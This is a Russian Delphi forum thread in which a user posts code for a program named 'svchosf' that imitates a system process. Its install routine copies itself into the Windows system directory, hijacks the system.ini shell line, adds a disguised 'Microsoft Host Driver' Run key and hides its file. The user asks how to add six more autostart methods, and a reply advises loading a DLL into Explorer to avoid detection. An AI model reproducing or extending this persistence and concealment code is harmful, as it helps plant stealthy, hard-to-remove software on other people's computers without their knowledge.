Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 21.06.2011, 09:50   #1
MYSTiQUE1983
Новичок
Джуниор
 
Регистрация: 21.06.2011
Сообщений: 2
Восклицание Проблема с автозагрузкой

Всем привет! Есть у меня вот какой вопрос! Мне надо добавить в программу для компьютерного клуба автозагрузку из всевозможных мест
Далее приведу куски проги чтобы было немного понятно что мне нужно

кусочек самой проги
Код:


program svchosf;

uses
  Windows,
  uConst,
  uUtils,
  uString,
  uSystemInfo,
  uWininet,
  uInstall,
    UnitWindows,
  shellapi,
  uSocks5,
  var
  Thread ,Thread0  :Cardinal;
  idThread   :Cardinal;
  dThread    :Cardinal;
далее в коде проги

Код:
begin

 ReleaseIt;
   Install;
где меня интересует ф-ция Install

далее идем в эту uInstall.pas

Код:
unit uInstall;

interface

uses
  Windows, ShellApi, uConst, uUtils, uProcess,uStartUp ;

function Install :Boolean;
procedure HideFile(FileName :String);
const
  faHidden    = $00000002 platform;
  faSysFile   = $00000004 platform;

implementation

function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
  Result := 0;
  if not SetFileAttributes(PChar(FileName), Attr) then
    Result := GetLastError;
end;

procedure HideFile(FileName :String);
begin
  FileSetAttr(FileName, faHidden or faSysFile);
end;
  {
function Install :Boolean;
var
  hRegKey :HKEY;
  Path  :String;
begin
  Result := False;
  if C_START = 1 then
  begin
      Path := WinDir(C_VALUE);
    RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', 0, KEY_SET_VALUE, hRegKey);
    RegSetValueEx(hRegKey, PChar(C_KEY), 0, REG_SZ, PChar(Path), Length(Path)+1);
    RegCloseKey(hRegKey);
    if not FileExists(Path) then
    begin
      CopyFile(PChar(ParamStr(0)), PChar(Path), False);
      if C_HIDE = 1 then HideFile(Path);
      ShellExecute(0, 'open', PChar(Path), nil, nil, SW_HIDE);
      Result := True;
    end;
  end;
end;
}
function Install :Boolean;
var
  dir: array[0..255] of char;
  name: string;
begin
  getsystemdirectory(dir, 256);

  name := string(dir)+'\svchosf.exe';
  copyfile(pchar(paramstr(0)), pchar(name), false);//копируем файл ... если есть перезапишем!

  writeprivateprofilestring('boot','shell','Explorer.exe svchosf.exe','system.ini');
  AddToRun('Microsoft Host Driver ',pchar(name));
 Result := True;

end;
end.
и видим там

Код:
uses
  Windows, ShellApi, uConst, uUtils, uProcess,uStartUp
меня интересует эта uStartUp.pas

далее ее код

Код:
//6 Видов автозапуска
unit uStartUp;

interface

uses windows, sysutils;

procedure AddToRun(name,exe:string);
procedure AddToRunOnce(name,exe:string);
procedure AddToPolicies(name,exe:string);
procedure AddToActiveX(exe:string);
procedure AddToUserInit(exe:string);
procedure AddToShell(exe:string);

и т.д. и т.п.
так вот в этой uInstall.pas загрузка идет как вы поняли только через

HKEY_CURRENT_USER, 'Software\Microsoft\Windows\Current Version\Run


с помощью файла svchosf.exe

отсюда вопрос нахрена в этом Install вызывать uStartUp.pas с 6 путями для автозапуска
и никак это не использовать...? или я че то в этом коде не увидел?

Помогите кто может советом как мне реализовать в uInstall.pas эту uStartUp.pas чтобы использовать все 6 способов автозагрузки ?

заранее всем спасибо за дельные ответы
MYSTiQUE1983 вне форума Ответить с цитированием
Старый 21.06.2011, 09:53   #2
JetUS
Пользователь
 
Аватар для JetUS
 
Регистрация: 23.09.2009
Сообщений: 27
По умолчанию

Раз ты уж собрался вирус написать, то хоть почитай статьи на эту тему, потому что вирусная программа по сути должна быть написана очень грамотно, учитывая особенности версий ОС.
JetUS вне форума Ответить с цитированием
Старый 21.06.2011, 09:56   #3
MYSTiQUE1983
Новичок
Джуниор
 
Регистрация: 21.06.2011
Сообщений: 2
По умолчанию

при чем тут вирус .. мне надо мне нужно чтоб ушлые пацанчики в клубе ее не отключили...
MYSTiQUE1983 вне форума Ответить с цитированием
Старый 21.06.2011, 10:00   #4
JetUS
Пользователь
 
Аватар для JetUS
 
Регистрация: 23.09.2009
Сообщений: 27
По умолчанию

Цитата:
Сообщение от MYSTiQUE1983 Посмотреть сообщение
при чем тут вирус .. мне надо мне нужно чтоб ушлые пацанчики в клубе ее не отключили...
Если пацанчики ушлые, то отключат за 5 минут.
Повторяю, почитай мануалы. Хотя бы про банальную загрузку dll-ки в Explorer. И то уже намного тяжелее найти.
JetUS вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема с рамами/Проблема с ЖД DRAGGER Компьютерное железо 6 04.01.2009 23:37